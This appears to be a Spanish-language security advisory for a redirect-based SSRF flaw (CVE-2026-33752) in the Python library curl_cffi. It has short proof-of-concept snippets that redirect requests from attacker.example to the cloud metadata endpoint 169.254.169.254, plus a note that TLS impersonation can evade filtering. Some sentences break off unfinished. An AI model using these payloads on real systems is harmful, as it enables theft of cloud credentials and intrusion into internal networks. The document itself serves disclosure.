
Demuestra una vulnerabilidad de SSRF basada en redirección en curl_cffi que permite el acceso a la red interna, con código PoC y análisis de la evasión por suplantación de TLS.
CVE-2026-33752 (SSRF basado en redirecciones que permite el acceso a la red interna en curl_cffi)
curl_cffi no restringe las solicitudes a rangos de IP internos y sigue las redirecciones automáticamente mediante la librería subyacente libcurl.
Debido a esto, una URL controlada por un atacante puede redirigir solicitudes a servicios internos, como los endpoints de metadatos de la nube. Además, la función de suplantación de TLS de curl_cffi puede hacer que estas solicitudes parezcan tráfico legítimo de un navegador, lo que podría eludir ciertos controles de red.
El problema proviene de cómo curl_cffi maneja las solicitudes salientes
Esto significa que, incluso si una aplicación solo permite solicitudes a URLs externas, un atacante puede
Como resultado, se puede acceder a endpoints internos (como las APIs de metadatos de instancias en la nube).
Además, curl_cffi admite la suplantación de huellas TLS (por ejemplo, impersonate="chrome"). En entornos donde las solicitudes salientes se filtran según la huella TLS, esto puede hacer que dichas solicitudes sean más difíciles de detectar o bloquear.
Este comportamiento es similar a problemas de SSRF basados en redirecciones reportados anteriormente, como CVE-2025-68616, donde las redirecciones permitían el acceso a recursos internos no deseados.
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
Código de la víctima:
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
Resultado
import curl_cffi\
resp = curl_cffi.get(
"https://attacker.example/test",
impersonate="chrome")
En algunos entornos, esto puede ayudar a que la solicitud eluda los controles de filtrado basados en TLS.
Un atacante que pueda controlar la URL solicitada podría: